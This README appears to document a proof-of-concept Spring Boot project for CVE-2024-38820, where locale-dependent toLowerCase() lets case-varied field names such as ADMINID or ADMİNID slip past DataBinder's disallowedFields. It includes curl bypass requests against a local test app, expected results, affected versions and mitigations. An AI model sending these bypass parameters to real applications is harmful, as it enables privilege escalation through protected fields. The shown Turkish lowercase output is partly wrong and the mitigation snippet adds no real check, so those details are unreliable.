# CVE-2024-38820 Proof of Concept

## Overview

This project demonstrates **CVE-2024-38820**, a vulnerability in Spring Framework's DataBinder that allows bypassing `disallowedFields` protection due to locale-dependent case conversion issues.

## Vulnerability Details

- **CVE ID**: CVE-2024-38820
- **Affected Component**: Spring Framework DataBinder
- **Root Cause**: `String.toLowerCase()` behavior varies by locale
- **Impact**: Field protection bypass, potential privilege escalation

### The Problem

The fix for CVE-2022-22968 made `disallowedFields` patterns case-insensitive by using `String.toLowerCase()`. However, this method has locale-dependent exceptions:

- In **Turkish locale**: `"ADMINID".toLowerCase()` becomes `"adminıd"` (with dotless ı)
- In **English locale**: `"ADMINID".toLowerCase()` becomes `"adminid"` 

This difference can allow attackers to bypass field protection by using specific case variations.

## Project Structure

```
src/
├── main/java/com/example/demo/
│   ├── DemoApplication.java          # Spring Boot main class
│   ├── controller/UserController.java # Vulnerable controller with @InitBinder
│   └── model/UserInfo.java           # Model with protected adminId field
└── resources/application.properties   # Locale configuration

test-cve-2024-38820.sh                # Automated test script
pom.xml                               # Maven dependencies (Spring 5.3.39 - vulnerable)
```

## Quick Start

### 1. Build and Run

```bash
# Build the project
mvn clean compile

# Run the application
mvn spring-boot:run
```

The application will start on `http://localhost:8081`

### 2. Manual Testing

Visit the test endpoint to see locale information:
```
http://localhost:8081/test
```

Try different field name variations:
```bash
# Normal case (should be blocked)
curl "http://localhost:8081/user?username=test&adminId=999"

# Uppercase (may bypass)
curl "http://localhost:8081/user?username=test&ADMINID=999"

# Mixed case (may bypass)  
curl "http://localhost:8081/user?username=test&AdminId=999"

# Turkish İ character (may bypass)
curl "http://localhost:8081/user?username=test&ADMİNID=999"
```

### 3. Automated Testing

Run the comprehensive test script:
```bash
./test-cve-2024-38820.sh
```

## Expected Results

### With Turkish Locale (tr_TR)
- ✅ `adminId=999` → **BLOCKED** (normal case)
- 🚨 `ADMINID=999` → **BYPASSED** (uppercase)
- 🚨 `AdminId=999` → **BYPASSED** (mixed case)
- 🚨 `ADMİNID=999` → **BYPASSED** (Turkish İ)

### With English Locale (en_US)
- ✅ `adminId=999` → **BLOCKED** (normal case)
- ✅ `ADMINID=999` → **BLOCKED** (protected)
- ✅ `AdminId=999` → **BLOCKED** (protected)

## Configuration

### Changing Locale

Edit `src/main/resources/application.properties`:

```properties
# Turkish locale (vulnerable)
spring.web.locale=tr_TR
server.servlet.locale=tr_TR

# English locale (protected)
# spring.web.locale=en_US
# server.servlet.locale=en_US
```

### Setting JVM Locale

You can also set the JVM default locale:
```bash
mvn spring-boot:run -Duser.language=tr -Duser.country=TR
```

## Vulnerability Analysis

### Code Flow

1. **Request Processing**: Spring receives HTTP request with parameters
2. **DataBinder Setup**: `@InitBinder` configures `disallowedFields("adminId")`
3. **Field Matching**: Spring uses case-insensitive matching with `toLowerCase()`
4. **Locale Issue**: In Turkish locale, `"ADMINID".toLowerCase()` ≠ `"adminid"`
5. **Bypass**: Field protection fails, `adminId` gets set

### Debug Output

The application logs detailed information:

```
=== CVE-2024-38820 PoC - Locale Information ===
JVM Default Locale: tr_TR
Test field 'ADMINID' toLowerCase(): 'adminıd'
Test field 'ADMINID' toLowerCase(Locale.ENGLISH): 'adminid'
DataBinder configured with disallowed field: 'adminId'
```

## Affected Versions

- **Spring Framework**: 5.3.x (before 5.3.40), 6.0.x (before 6.0.24), 6.1.x (before 6.1.13)
- **Spring Boot**: 2.x and 3.x versions using affected Spring Framework versions

## Mitigation

### 1. Upgrade Spring Framework
- Spring Framework 5.3.40+
- Spring Framework 6.0.24+  
- Spring Framework 6.1.13+

### 2. Explicit Locale Setting
Use locale-aware field matching:
```java
@InitBinder
public void initBinder(WebDataBinder dataBinder) {
    // Use English locale explicitly
    dataBinder.setDisallowedFields("adminId");
    // Additional protection: check field names with specific locale
}
```

### 3. Custom Field Validation
Implement custom field validation that doesn't rely on locale-dependent operations.

## References

- [CVE-2024-38820 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-38820)
- [Spring Framework Security Advisory](https://spring.io/security/cve-2024-38820)
- [Related CVE-2022-22968](https://nvd.nist.gov/vuln/detail/CVE-2022-22968)

## Legal Notice

This proof of concept is for educational and security research purposes only. Use responsibly and only on systems you own or have explicit permission to test.